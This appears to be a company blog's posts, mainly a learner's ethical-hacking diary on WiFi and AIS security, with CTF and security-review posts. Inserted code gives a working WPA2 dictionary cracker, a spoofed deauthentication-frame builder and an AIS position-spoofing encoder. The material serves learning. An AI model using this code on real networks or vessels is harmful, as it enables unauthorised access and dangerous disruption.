
w00t and pillage – Captain’s bLog: day 5

The studies continue!  This has been a busy week, so I only got to cover the theory and practice behind cracking WiFi passwords – WEP, WPA, and WPA2.

WEP cracking is fairly straightforward.  Every WEP frame carries its 24-bit initialisation vector (IV) in the clear, and the RC4 keystream that encrypts the frame is derived from the IV plus the shared key, so it's just a matter of gathering enough frames with distinct IVs for the statistical attack in aircrack-ng (PTW) to recover the key itself. Both gathering the packets (airodump-ng) and cracking the key (aircrack-ng) are done with packages pre-installed in Kali. The cool thing was speeding up the gathering of packets with ARP request replay (aireplay-ng): a captured encrypted ARP request is retransmitted over and over, and the access point answers every copy with a freshly encrypted reply carrying a new IV, without the device owners necessarily noticing.
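
The property that the capture-and-crack approach above relies on, as an added example that is not from the course or this post: the IV is public and the keystream is a function of IV plus key, so a known frame under one IV exposes the keystream for every other frame under that IV. RC4 is implemented inline, the 40-bit key and both frames are constructed for the demo, and the CRC-32 ICV that real WEP appends is omitted. aircrack-ng goes a step further than this and recovers the key itself statistically from many IVs; this shows why each captured frame leaks something at all.

```python
# Added example (not from the course or this post): the property that makes
# WEP capture-and-crack attacks work. RC4 is implemented inline and the two
# frames below are constructed for the demo; no real traffic is involved.
from typing import Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), enough to model WEP's per-frame keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> Tuple[bytes, bytes]:
    """WEP encapsulation: per-frame RC4 key is IV || shared key, and the
    24-bit IV travels in the clear. (Real WEP also appends a CRC-32 ICV
    before encrypting; omitted here because it does not change the point.)"""
    assert len(iv) == 3
    return iv, rc4(iv + key, plaintext)


def recover_keystream(known_plaintext: bytes, ciphertext: bytes) -> bytes:
    """Known plaintext XOR ciphertext yields the keystream for that IV."""
    return bytes(p ^ c for p, c in zip(known_plaintext, ciphertext))


def decrypt_with_keystream(keystream: bytes, ciphertext: bytes) -> bytes:
    """Any other frame sent under the same IV decrypts with that keystream."""
    return bytes(k ^ c for k, c in zip(keystream, ciphertext))


# Constructed sample: a hypothetical 40-bit WEP key and two frames that share
# an IV. With only 2^24 IVs, a busy access point reuses them within hours.
WEP_KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("a1b2c3")
# The first 16 bytes of an ARP request are predictable: LLC/SNAP header,
# EtherType 0x0806, then hardware/protocol type and sizes and the opcode.
ARP_FRAME = bytes.fromhex("aaaa030000000806" "0001080006040001")
SECRET_FRAME = b"GET /login?user=bob&pw=hunter2 HTTP/1.1"


def demo() -> bytes:
    """Attacker sees both ciphertexts, knows the ARP plaintext, and reads the
    first len(ARP_FRAME) bytes of the other frame without ever having the key."""
    _, arp_ct = wep_encrypt(IV, WEP_KEY, ARP_FRAME)
    _, secret_ct = wep_encrypt(IV, WEP_KEY, SECRET_FRAME)
    keystream = recover_keystream(ARP_FRAME, arp_ct)
    return decrypt_with_keystream(keystream, secret_ct)


if __name__ == "__main__":
    print(demo())
```

Only as many keystream bytes are recovered as there is known plaintext, which is exactly why ARP frames, short and almost entirely predictable, are the ones the tools replay.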

WPA cracking of course is far more complex. The course covers the exploitation of the WPS feature, a far simpler backdoor into a WPA network (the 8-digit WPS PIN is verified in two halves, so an online brute force needs at most about 11,000 attempts rather than 100 million), but even around here WPS seems to be disabled by default or push-button-only.

For actual WPA cracking, I suppose it's a testament to its level of security that the recommended attack is still a brute force dictionary attack: capture the four-way handshake when a client connects (or is deauthenticated and reconnects), then derive the key from each candidate passphrase offline and check it against the MIC in the handshake. It was interesting to see what sort of ready libraries are available for download for testing – compilations of the top 10,000 passwords, actual dictionaries for different languages, and so on.
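
What that dictionary attack computes per candidate, as an added example that is not from the course or this post: PBKDF2 from passphrase and SSID to the PMK, the 802.11i PRF to the PTK, and an HMAC over the captured EAPOL-Key message 2 compared with the MIC it carries. The handshake here is constructed inline with a known passphrase so the demo runs offline; the SSID, MAC addresses and nonces are hypothetical.

```python
# Added example (not from the course or this post): what a WPA2-PSK
# dictionary attack actually computes for each candidate passphrase.
# The handshake below is constructed with a known passphrase so the demo
# runs offline; the SSID, MACs and nonces are hypothetical.
import hashlib
import hmac
from typing import Iterable, Optional, Tuple


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are the whole cost of the attack, per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from IEEE 802.11i: HMAC-SHA1 over a fixed label, the two MACs
    and the two nonces (each pair in sorted order), with a counter byte."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with the
    16-byte MIC field zeroed), truncated to 16 bytes. In an EAPOL-Key frame
    the MIC field occupies bytes 81..96."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
          eapol_msg2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: re-derive PMK -> PTK -> KCK per candidate and
    compare the MIC of message 2 (client -> AP; it carries the SNonce)."""
    observed_mic = eapol_msg2[81:97]
    for candidate in wordlist:
        pmk = derive_pmk(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), observed_mic):
            return candidate
    return None


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 with a valid MIC (demo input only)."""
    body = (b"\x02"                       # descriptor type: RSN
            + b"\x01\x0a"                 # key info: version 2, pairwise, MIC present
            + b"\x00\x10"                 # key length
            + b"\x00" * 7 + b"\x01"       # replay counter
            + snonce                      # key nonce (32 bytes)
            + b"\x00" * 32                # key IV, RSC, ID
            + b"\x00" * 16                # MIC placeholder
            + b"\x00\x00")                # key data length
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]


def sample_handshake() -> Tuple[str, bytes, bytes, bytes, bytes, bytes]:
    """Hypothetical capture: SSID, AP MAC, STA MAC, ANonce, SNonce, EAPOL msg 2."""
    ssid = "harbour-guest"
    ap_mac = bytes.fromhex("00112233aabb")
    sta_mac = bytes.fromhex("c0ffee001122")
    anonce = hashlib.sha256(b"anonce").digest()
    snonce = hashlib.sha256(b"snonce").digest()
    kck = derive_ptk(derive_pmk("sailing2019", ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return ssid, ap_mac, sta_mac, anonce, snonce, build_msg2(snonce, kck)


def demo() -> Optional[str]:
    ssid, ap_mac, sta_mac, anonce, snonce, msg2 = sample_handshake()
    wordlist = ["password1", "letmein", "sailing2019", "hunter2"]
    return crack(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist)


if __name__ == "__main__":
    print(demo())
```

Everything except the PBKDF2 step is cheap, which is why a CPU core manages only a few thousand candidates per second and real runs go to GPUs with hashcat against those downloaded wordlists. The same arithmetic also explains why a long random passphrase is simply out of reach, and why WPA3's SAE handshake, which leaks nothing usable for offline guessing, is the actual fix.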

From my previous life in the corporate world, I have heard most of the horror stories of password policies. This class is the reason why we keep hearing the same ones – “why is the password to the server with our expensive custom software ‘password1’?” A justification for borderline paranoia regarding information security in the modern world is the “password on a post-it note on the monitor” and social engineering.  You might have strong passwords and encryption, but those you communicate with may not. So you want to collect data? Carry a clipboard and go anywhere.

I enjoyed the discussions of cryptography and password policies in Neal Stephenson’s Cryptonomicon. And still, at times I feel like D. M. Shaftoe’s character, too paranoid to use cryptography at all, since if something is worth keeping secret, it shouldn’t be shared digitally at all.

My secrets are safe, though. Notebooks, illegible handwriting, and fluency in obscure languages.

Midnight sun in a land of obscure languages

w00t and pillage – Captain’s bLog: day 4

My Atheros AR9271 USB device arrived!  Now I’m back into my courses as originally planned.  I now keep my course in one workspace and a Kali VM in another.  I have used Kali before, but never under guidance – just fiddling around with a Live USB.

Step 1 today was changing the MAC address of my wi-fi adapter.  Reminds me of the first time I lived in shared housing, back at Oxford University.  To get ethernet access for my new PC after the old one packed it in, I had to submit my new computer’s ethernet MAC address for approval by the sysadmin.  I couldn’t be bothered, so I changed the MAC address to match the old one instead.

Step 2 was setting up monitor mode on my wi-fi adapter.  Even without manipulating any of the outputs of airodump-ng wlan0, the potential power here is obvious.  I’m not in a high-tech location. Everyone’s routers are broadcasting freely, and everyone has at least a smartphone turned on and typically connected to publicly visible wi-fi.  Since Viber is more popular than actual phone minutes or SMS, and virtually nobody takes steps towards anonymising themselves, there are privacy implications right off the bat – and I reckon almost nobody here is aware of it.  The data itself is encrypted, of course, but the fact of the data traffic being visible at all is noteworthy – and pretty cool.

Step 3 was my first ever deauthentication signal with aireplay-ng --deauth.  Or, in other words: with $23 of hardware incl. shipping, I booted my phone off my wi-fi, without touching it, and could keep it offline as long as I wanted, after 15 minutes of video lectures.  Only ethics stops me from keeping my neighbours off the internet. This made it sink in just how easy it actually would be to cause general havoc with vulnerability hacking.
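
The frame behind step 3, as an added example that is not from the course or this post: an 802.11 deauthentication frame is a 24-byte management header plus a two-byte reason code, and the "source" address is simply asserted to be the access point's, which is the whole trick. The block builds and parses one, and adds the check a tester would make first, reading the Management Frame Protection bits from a beacon's RSN element, because a network that requires 802.11w makes clients drop exactly this frame. The MAC addresses and RSN elements are constructed.

```python
# Added example (not from the course or this post): the frame that
# "aireplay-ng --deauth" transmits, built and parsed by hand, plus the one
# check worth making first. MAC addresses and the RSN elements are constructed.
import struct
from dataclasses import dataclass
from typing import Dict

BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3_FRAME_FROM_NONASSOC_STA = 7   # the reason code aireplay-ng sends


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(bssid: str, target: str = BROADCAST,
                 reason: int = REASON_CLASS3_FRAME_FROM_NONASSOC_STA, seq: int = 0) -> bytes:
    """802.11 deauthentication: 24-byte management header + 2-byte reason code.
    Frame control 0x00c0 = type 0 (management), subtype 12 (deauthentication).
    The transmitter address is merely claimed to be the AP's; nothing proves it."""
    frame_control, duration = 0x00C0, 0
    header = struct.pack("<HH6s6s6sH", frame_control, duration,
                         mac_bytes(target),   # addr1: receiver (one client or broadcast)
                         mac_bytes(bssid),    # addr2: transmitter, spoofed as the AP
                         mac_bytes(bssid),    # addr3: BSSID
                         seq << 4)            # sequence control (fragment number 0)
    return header + struct.pack("<H", reason)


@dataclass
class Deauth:
    dst: str
    src: str
    bssid: str
    reason: int


def parse_deauth(frame: bytes) -> Deauth:
    """Inverse of build_deauth; rejects anything that is not a deauth frame."""
    fc, _duration, a1, a2, a3, _seq = struct.unpack("<HH6s6s6sH", frame[:24])
    if fc & 0x00FC != 0x00C0:                # mask the type and subtype bits
        raise ValueError("not a deauthentication frame")
    (reason,) = struct.unpack("<H", frame[24:26])
    return Deauth(mac_str(a1), mac_str(a2), mac_str(a3), reason)


def rsn_capabilities(rsn_ie: bytes) -> Dict[str, bool]:
    """Read the Management Frame Protection bits from an RSN information
    element (tag 0x30) as carried in a beacon. With MFPR set (802.11w) the
    clients drop unprotected deauth frames like the one built above."""
    if rsn_ie[0] != 0x30:
        raise ValueError("not an RSN element")
    body = rsn_ie[2:2 + rsn_ie[1]]
    pos = 2 + 4                                       # version, group cipher suite
    (pairwise_count,) = struct.unpack_from("<H", body, pos)
    pos += 2 + 4 * pairwise_count
    (akm_count,) = struct.unpack_from("<H", body, pos)
    pos += 2 + 4 * akm_count
    (caps,) = struct.unpack_from("<H", body, pos)     # RSN capabilities, little-endian
    return {"mfp_capable": bool(caps & 0x0080), "mfp_required": bool(caps & 0x0040)}


# Constructed RSN elements: WPA2-PSK with CCMP, without and with required PMF.
RSN_NO_PMF = bytes.fromhex("3014" "0100" "000fac04" "0100000fac04" "0100000fac02" "0000")
RSN_PMF_REQUIRED = bytes.fromhex("3014" "0100" "000fac04" "0100000fac04" "0100000fac02" "c000")


def demo() -> Deauth:
    """Hypothetical AP and phone addresses; never transmit this at networks you do not own."""
    frame = build_deauth(bssid="00:11:22:33:44:55", target="aa:bb:cc:dd:ee:ff")
    return parse_deauth(frame)


if __name__ == "__main__":
    print(demo(), rsn_capabilities(RSN_PMF_REQUIRED))
```

Transmitting it needs an adapter and driver that support monitor mode and injection, which is what the USB passthrough of the AR9271 is really buying; aireplay-ng sends the frame in both directions (to the client as if from the AP, and to the AP as if from the client). Against a network whose RSN element reports mfp_required, the frame is received and silently discarded, so the check above decides whether the attack can work at all before anything is sent.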

I wonder why societies or the media in general don’t seem to take security vulnerabilities very seriously?  Many moons ago when I lived in –redacted–, there were rumours and mutterings followed by a full-blown scandal when it was discovered that the NSA’s Echelon program had a partner station there.  In fairly short order, cries about national sovereignty and privacy violations were silenced with statements like “the data is all encrypted anyway”. Even if encryption in general use by the general public at the time was effective and reliable (spoiler: nope), data flow itself is useful information – such as if your spouse’s phone regularly connects to the router of the attractive neighbour.

That is what struck me most about Edward Snowden’s revelations – enormous outcries for a short period, followed by… essentially nothing.  Despite the revelations that some of our online service providers, probably even chipset and OS manufacturers, are cooperating with foreign intelligence agencies to be able to manipulate or even access our personal data, most people don’t seem to take the slightest measures to protect their own data.

I look forward to learning a lot more about protecting data systems beyond the obvious steps I take already.  Although I now also have to fight the impulse to boot the harbourmaster off his wi-fi.

A bleak winter’s day in –redacted–

w00t and pillage – Captain’s bLog: day 3

Happy New Year! The local sailing club held a New Year’s Eve Regatta in the bay, a dozen vessels of very different sizes and types playing around. I couldn’t participate due to a broken cotter pin on the mast and the lack of a proper reefing system, but I did spend the evening afloat. Looking at the array of vessels from dinghies to superyachts in the bay or moored nearby, I got to thinking of maritime security.

Technology has vastly changed the maritime world. While an 18th-century ship of the line could have in excess of 1,000 souls aboard, and a 19th-century merchant ship could have a crew of hundreds, a modern cargo ship may not even have a dozen people aboard. In the 21st century, IT is everywhere. It is hardly a surprise that every yacht or commercial vessel today will have a GPS, even if only as a mobile device – but the IT aboard is more connected than you may expect.

The International Maritime Organisation’s SOLAS (Safety of Life at Sea) convention (Chapter V, Regulation 19) mandates that ships of 300 gross tonnage and upwards on international voyages, cargo ships of 500 gross tonnage and upwards on any voyage, and all passenger ships regardless of size must be fitted with AIS – the Automatic Identification System. Anyone with an AIS receiver may then see data of vessels equipped with AIS transponders – MMSI number and vessel name, position, navigational status (e.g. anchored or under way), speed and course, and even destination and ETA – all broadcast in the clear on two marine VHF channels. You can even see this data now at https://www.marinetraffic.com. I use it myself on occasion to identify superyachts (which, given my location, I affectionately refer to as “mafia tubs”) pulling into the neighbouring luxury marina.

One would think that this system would be designed with security in mind? Well, quite the opposite, according to Trend Micro’s 2014 research paper on AIS (Balduzzi, Pasta and Wilhoit).  AIS messages carry no authentication or integrity protection beyond a transmission checksum, so anyone with a transmitter, or with access to one of the internet feeds that the online trackers aggregate, can inject altered or invented reports. In theory one could stop marine traffic in busy channels or harbours by exaggerating the size of one’s own vessel – imagine your transponder claiming your vessel was one square kilometer in size, when the transponder could be aboard a rowboat. One could also spoof signals, for example broadcasting warnings about drifting mines, or faking a maritime distress.
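
What an AIS position report looks like on the wire, as an added example that is not from the post or the Trend Micro paper: a Class A position report (message type 1) packed into the 6-bit ASCII payload of an NMEA !AIVDM sentence, decoded back, and then re-issued from a different position. The vessel, MMSI and coordinates are constructed. The only thing a receiver verifies is the NMEA checksum, which is a transmission-error check and not a security measure, so the spoofed sentence is indistinguishable from the real one.

```python
# Added example (not from the post or the Trend Micro paper): an AIS Class A
# position report (message type 1) encoded and decoded as an NMEA !AIVDM
# sentence. The vessel, MMSI and positions are constructed; the point is that
# nothing in the format distinguishes a real report from a forged one.
from typing import Dict, List, Tuple

Field = Tuple[int, int, bool]   # (value, bit width, signed)


def nmea_checksum(body: str) -> str:
    """XOR of every character between the leading '!' and the '*'."""
    value = 0
    for ch in body:
        value ^= ord(ch)
    return f"{value:02X}"


def bits_to_payload(bits: str) -> Tuple[str, int]:
    """Pack a bit string into AIS 6-bit ASCII; returns (payload, fill bits)."""
    fill = (-len(bits)) % 6
    bits += "0" * fill
    chars = []
    for i in range(0, len(bits), 6):
        v = int(bits[i:i + 6], 2)
        chars.append(chr(v + 48 if v < 40 else v + 56))
    return "".join(chars), fill


def payload_to_bits(payload: str) -> str:
    out = []
    for ch in payload:
        v = ord(ch) - 48
        if v > 40:
            v -= 8
        out.append(f"{v:06b}")
    return "".join(out)


def encode_position_report(mmsi: int, lat: float, lon: float, sog_knots: float,
                           cog_deg: float, status: int = 0, heading: int = 511) -> str:
    """Build a complete !AIVDM sentence for a type 1 report (168 bits)."""
    fields: List[Field] = [
        (1, 6, False), (0, 2, False), (mmsi, 30, False), (status, 4, False),
        (-128, 8, True),                      # rate of turn: not available
        (round(sog_knots * 10), 10, False), (1, 1, False),
        (round(lon * 600000), 28, True), (round(lat * 600000), 27, True),
        (round(cog_deg * 10), 12, False), (heading, 9, False),
        (60, 6, False),                       # timestamp: not available
        (0, 2, False), (0, 3, False), (0, 1, False), (0, 19, False),
    ]
    bits = ""
    for value, width, signed in fields:
        if signed and value < 0:
            value += 1 << width                # two's complement in `width` bits
        bits += f"{value:0{width}b}"
    payload, fill = bits_to_payload(bits)
    body = f"AIVDM,1,1,,A,{payload},{fill}"
    return f"!{body}*{nmea_checksum(body)}"


def decode_position_report(sentence: str) -> Dict[str, float]:
    """Verify the checksum and unpack the fields a chart plotter would show."""
    body, checksum = sentence[1:].split("*")
    if nmea_checksum(body) != checksum:
        raise ValueError("bad NMEA checksum")
    bits = payload_to_bits(body.split(",")[5])

    def u(start: int, width: int) -> int:
        return int(bits[start:start + width], 2)

    def s(start: int, width: int) -> int:
        v = u(start, width)
        return v - (1 << width) if v >= 1 << (width - 1) else v

    return {"type": u(0, 6), "mmsi": u(8, 30), "status": u(38, 4),
            "sog": u(50, 10) / 10, "lon": s(61, 28) / 600000,
            "lat": s(89, 27) / 600000, "cog": u(116, 12) / 10, "heading": u(128, 9)}


def spoof(sentence: str, lat: float, lon: float) -> str:
    """Re-issue someone else's report from a new position. A receiver cannot
    tell the difference, which is the attack surface the paper describes."""
    r = decode_position_report(sentence)
    return encode_position_report(int(r["mmsi"]), lat, lon, r["sog"], r["cog"],
                                  int(r["status"]), int(r["heading"]))


# Constructed sample vessel and position (hypothetical).
SAMPLE = encode_position_report(mmsi=123456789, lat=47.6, lon=-122.345, sog_knots=3.4, cog_deg=271.5)

if __name__ == "__main__":
    print(SAMPLE)
    print(decode_position_report(spoof(SAMPLE, lat=0.0, lon=0.0)))
```

A receiving ship's plotter, or an online aggregator fed from a hobbyist receiver, accepts either sentence on equal terms; the "vessel one square kilometre in size" scenario is the same trick applied to the static-data message (type 5), which carries the dimensions.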

The consequences are serious. In the best case, a fake signal would just be an annoyance on a clear day, and backup and visual navigation plus radio communications would move everyone along – although with a number of blaring alarms that could cause chaos either from distraction or by leading to crew ignoring real signals lost in the noise. In the worst case, malicious actors could shut down vessel movement in an area completely, which in the case of poor weather and low visibility, could lead to severe accidents – or the publicly-available data could enable piracy. Combine it with a hack of a corporate database to identify the most lucrative targets, and a modern-day Bart Roberts could make a fortune without exceptional skills.

It gets better! AIS is rarely an isolated system. In modern vessels larger than a pleasure craft, AIS is likely to be integrated with the other navigational systems, such as GPS, radar and ECDIS (the Electronic Chart Display and Information System), and by extension potentially the entire control system of a vessel. One alleged hack in 2017 of a vessel travelling to Djibouti led to the captain being unable to maneuver at all for 10 hours, with the intention being to direct the vessel into waters where pirates could board and seize the vessel.

Modern commercial shipping relies so much on integrated computer systems that losing access to those systems, or receiving deliberately deceptive data from those systems, can raise absolute havoc. Cargo ships are not exceptionally maneuverable at the best of times – witness the recent Norwegian frigate collision (KNM Helge Ingstad and the tanker Sola TS, November 2018), with the frigate sunk and the tanker damaged even with all their computer systems working, due primarily to human factors and low visibility.

I recommend the Trend Micro report for further reading, as well as this.

I do not see a clear solution, nor a legal alternative for commercial vessels, beyond pressing ship owners to harden their security as much as they are able. As for myself – I’m well below the tonnage to require AIS and have no need of it, and can use a radar reflector on the mast to be more visible to ships less able to maneuver easily. I have a VHF radio and paper charts and am fully capable of navigating safely enough day or night by dead reckoning, charts, binnacle compass, and even celestial navigation and sextant if I were to head offshore. Low visibility? Down anchor, break out the rum.

Simpler rules for simpler vessels from a simpler time

w00t and pillage – Captain’s bLog: day 2

Today I got started with the basics of wireless network hacking.  The instructor went through the basics of what networking is and how it functions.  Obviously the key is that in any network, the assets (like individual laptops, mobiles, tablets) do not connect to the end resource (a server, or the internet) directly, but all go through a router or similar.  With wireless networking, that provides ample possibilities for pre-connection attacks, attacks by gaining access, and post-connection attacks.

I ran into a small hardware roadblock at this point.  Since I’m now doing things “properly” with a Kali VM for learning and practice, my VM can’t properly access my wireless card.  Therefore I need a USB wireless adapter so the VM can access the wireless hardware through the USB. The instructor recommends the Atheros AR9271 chipset, and sells them alongside the course… since I live in a tiny agriculture-based non-EU nation that doesn’t even exist in many online stores’ dropdown menus, my options for buying a suitable device were limited.  So the instructor made another $23 off me with his online store. Well, merry Christmas to me.

While I’m waiting on shipping, I get to think about connectivity through the ages.  I grew up in Africa, and my first experience with the internet was borrowing my dad’s connection at work to find out in real-time how Garry Kasparov’s chess match against Deep Blue was going.  Yep, I was that kind of teenager. In later years in Africa I would get my own connections at home, with the 28.8 modem running across the phone line, which meant the connection would drop if anyone picked up the phone.  Later there was a habit of phone lines getting crossed, which meant that when I was trying to get online I could hear diplomats’ phone conversations through my modem – quite a security problem in itself, especially as I spoke their language as well.

Now, of course, wi-fi is ubiquitous, and most people don’t give a second thought to their network access at the local bar or coffee shop.  I was in Cuba some time ago, and there, internet access is controlled by the state (with domestic LAN-based alternatives replicating a surprising amount of internet functionality on the island for free).  Every hotel would have its outside walls lined with Cubans accessing the outside world on their Android devices. How security-conscious are they, I wonder? As for myself, I thought it safer to stick to the rum and cigars, offline.

I look forward to learning more about the intricacies of networks.  Networks aren’t my strong point. Fortunately, they are my girlfriend’s strong point, so she advises me whenever I’m stuck.

Old and new in Havana

w00t and pillage – Captain’s bLog: day 1

I am venturing into the as-yet uncharted waters of ethical hacking…

For context: I have been using computers daily since the age of 4, when I would sneak into my brother’s room to borrow his Commodore 128 (who remembers 5 1/4 inch flippy disks?).  Growing up in Africa I got addicted to flight simulators and would reprogram my joysticks. Internet access arrived in 1996 where I lived, on a 28.8 modem on an “iffy” phone line. My formal studies were in history, but my work ultimately took me to overseeing bespoke simulator software and antivirus tech support. Even so, I stuck with operations and administration – until I got a Google scholarship for Android development, which brought me into Java programming. It turns out that was addictive.

Thus, by the time I joined Security Roots to join the Dradis Support team, I had a fair bit of IT operations experience, an awareness of best security practices, and a budding interest in programming and development. My skills are being tested daily, and growing as a result. So now I want to get deeper into the InfoSec and security testing worlds!

I have signed up to a number of online security courses about Ethical Hacking and purchased a virtual pile of books for my e-book reader for long nights aboard my sailing yacht. I will start with a general course covering most aspects of Ethical Hacking going into practical exercises for each realm. Next, I have a particular interest in learning about Android security and wireless hacking. To start my journey I have set up a fresh Kali virtual machine, and my first semi-formal training in network hacking begins tomorrow. I feel at home with Linux (even being no stranger to Kali and Tails, which I explored earlier out of curiosity), less so with networks. Let’s go!

Tales from the Other Side: we survived our first security review

In a dimly lit room with Doritos and Mountain Dew on my side, I was ready to begin the assessment and be like Hackerman. – Aaron

Recently, the Dradis team was presented with the opportunity to conduct a security review for a funded startup. Our original team comes from a background in security consulting. But, we also have team members who come from the software or support worlds. Basically, some of us (Aaron, Rachael, and Xavi) were n00bs and had never pwned anything before.

As someone who unintentionally adds holes in an application for a living (aka web developer), finding vulnerabilities in an app sounds like a fun activity that could give me a new perspective on my profession. – Aaron

Why did we decide to take on this project? We wanted to experience what you experience every day. The Dradis team doesn’t (usually) deliver security reports, we release software. We exhaustively test new releases and fix the bugs that you report to us. But, we rarely (if ever) get the chance to use Dradis in a real-world scenario. This time, we had a client, the team needed to collaborate despite time zone differences, and there was a deadline looming. Yes, we crossed over to the other side. And, we survived.

What we did:

  • Performed a security review on 3 components of a single web application
  • Drank a lot of coffee and/or mountain dew
  • Followed the WAHH (The Web Application Hacker’s Handbook) methodology (with some custom checks added in)
  • Found, verified, and reported on roughly 3 dozen Issues
  • Generated a Word report that was organized by Risk Rating (based on the CVSSv3 score) and by affected component
  • Delivered the report to the client, answered their questions, then wished we could celebrate in person as a team

We learned a lot. We delivered a report to our client that we’re proud of and we covered a lot of ground in a short period of time. The technical team did a great job transitioning from their day jobs as Ruby developers and becoming pentesters for a week. Aaron summed up the learning curve perfectly: it was “like a scientist trying to do ballet for the first time.” Everyone ran into at least a few walls. But, with some teamwork, fantastic resources, coffee, and a little Google, we got it all done. During the process of the security review, we learned about you, we learned about us, and we’re excited to apply these lessons as we continue building Dradis.

 

We learned a lot about you

No, not about you as a person, but we did learn a lot about our customers in the whole “walk a mile in their shoes” sense. By using Dradis to perform a real-world security review, we got insight into how we can make Dradis so much better for you in the future.

Here’s an example:

We’re a remote team. On this project, team members were collaborating between 3 different continents. Team members jumped in and worked during their own daylight hours. After about day 2 of the project, we realized that we were pasting links from the Dradis project into Slack with messages like “Hey, I don’t understand this part, can you clarify?”. Then, the author of the Issue would have to log back into Dradis, edit the content over there, and then update the Slack thread saying “I fixed it! How does that look now?”.

You know what we needed instead? The ability for all of those conversations to take place within Dradis. This wasn’t our only lightbulb moment, but it was one of the biggest. We can’t wait to roll out new features and improvements to give you the features that we were looking for!

 

We learned a lot about reporting (and deadlines)

Dradis is a collaboration and reporting tool. So, learning about reporting and deadlines is really the same as learning about ourselves. Some of us also learned more about our caffeine tolerance during the security review, but you want to hear about Dradis, right?

I (Rachael) spend a whole lot of time with your report templates. I’ve made friends with Microsoft Word (ok, it’s still a rocky relationship sometimes) and can break and fix just about anything you throw at me. But, I’d never experienced generating a report with Dradis while under an external deadline before. This time, I knew that there was a client waiting for me to review the findings and export the report.

We’ve always had a “we will go above and beyond for our customers” approach to support. But, the next time we get an email like “MY REPORT WAS DUE YESTERDAY AND IT’S BROKEN OH GOD PLEASE HELP ME” (not a direct quote), we can understand you even better. That extra understanding of what you’re going through was worth every hour we spent on this security review.

And it’s not just on the support side. We want to take our newfound understanding and help take away even more of the work (and stress) of the reporting process. How? By improving Dradis.

Improvements: Big and Small

We found plenty of small (and big!) improvements that we can’t wait to implement. We quickly identified a few UI tweaks. In some cases, they’re as simple as moving a button or adding different scrolling options. But, if we were internally screaming for them, we think you’ll like them too.

Some of the takeaways were bigger. For example, after going through the QA process ourselves, we feel very strongly that we need a more seamless QA process within Dradis.

Back to the other side

In the end, we all ended the security review with a deeper respect for what you all do every day. Walking the digital equivalent of a mile in your shoes left us with a list of improvements that we think will make the road a little less rocky for you next time. But, we’re ready to head back to the other side (the software development side) and leave the security reviewing to all of you again. You find the vulns, we’ll keep making Dradis better for you. Stay tuned for more Dradis improvements in the coming months!

 

 

Dradis at Play

Note: this is a guest post by J Wolfgang Goerlich (@jwgoerlich), Captain of the MiSec RuCTFe 2012 team.

Ten. Nine. Eight. We stand in the war room of a data center. Seven. Six. We watch the scoreboard and count down the final few seconds. Five. Four. It was a tough day, but the team really came together at the end. Three. The organizers extended it by ninety minutes. We’re tired, hungry, and ready to celebrate. Two. Tomorrow, we can reflect with Dradis. One. Game over.

Let’s jump back for a moment. MiSec is a loose knit group of IT security professionals and students. We regularly toss out a capture-the-flag challenge. Whoever is interested attends, and whoever attends becomes the team. The only price of admission is the passion for learning something new and the dedication to teaching others what you learn.

This was our second time playing the RuCTFe. It is an English CTF organized by the Russian CTF team HackerDom of Ural Federal University. Limited to 150 teams world-wide and played out live for several hours once a year, it is quite the event on the MiSec calendar.

But that is not the only CTF we compete in. We put together ad hoc teams every couple of months for various events. CTFtime has us as the 119th team in 2011 and the 173rd team in 2012. That is out of 1815 CTF teams world-wide. We get a lot of play.

The challenge is coordination and information sharing. With people all over the state participating, and with an ever changing roster of teammates, you never quite know what to expect. The trick is getting people onto the same page during the incredibly fast paced CTF events.

Dradis is the answer. Each time there is a CTF, one of the team members takes point in setting up a new Dradis instance. We organize the folders by challenges. As progress is made and new things are learned, people make notes. Each Dradis instance becomes a snapshot of our team’s efforts.

Back in the game, the countdown hits one. We pack up our gear. We clear the war room. The Dradis virtual machine is shut down, copied, and distributed to the team. Over the coming days, we will review our findings and read other teams’ write-ups. This will culminate in a debriefing like the one below in about a week. Game over.

https://www.youtube.com/embed/mUzJTsk2VCE

We would like to thank the Dradis project maintainers for their efforts and support. CTFs are crazy enough. Adding an ever changing team roster is even crazier. Toss in a mix of people all over the place dialing in at all different times. Insanity. Dradis keeps us sane and has become a fundamental part of MiSec’s CTF strategy. Thanks gents.

